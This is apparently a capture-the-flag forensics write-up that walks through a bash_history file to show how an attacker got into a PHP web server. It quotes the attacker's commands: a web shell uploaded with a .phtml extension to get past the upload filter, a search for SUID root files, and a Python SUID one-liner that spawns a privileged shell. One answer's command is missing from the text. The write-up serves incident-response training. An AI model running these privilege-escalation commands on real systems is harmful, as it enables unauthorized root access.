A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?


We have a single file, bash_history. This is, as the name suggest, the history of commands run in the terminal (bash). This challenge is simply reading through the commands and understanding what they all do.

What user (other than ‘root’) is present on the server?

In Linux, user directories are located within /home. Looking through the logs, on line 21, we see:

cd /home/daniel/

Change directory to daniel’s home folder.


What script did the attacker try to download to the server?

We can simply look for scripts, URLs, or methods to download things via bash. Line 32:

wget -O

What packet analyzer tool did the attacker try to use?

What’s the most common packet analyser tool for the command line? Line 47:


What file extension did the attacker use to bypass the file upload filter implemented by the developer?

Here we can look for uploads for files (with file extensions). Right at the end, line 63, there is a remove command for deleting a file within an uploads folder:

rm /var/www/html/uploads/x.phtml


Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load

Python is mentioned on line 62:

./usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Immediately before this, line 61, there is a find command:

find / -type f -user root -perm -4000 2>/dev/null

This find looks for files (-type f) owned by root (-user root) with permissions of 4000 (-perm -4000) - relates to SUID files.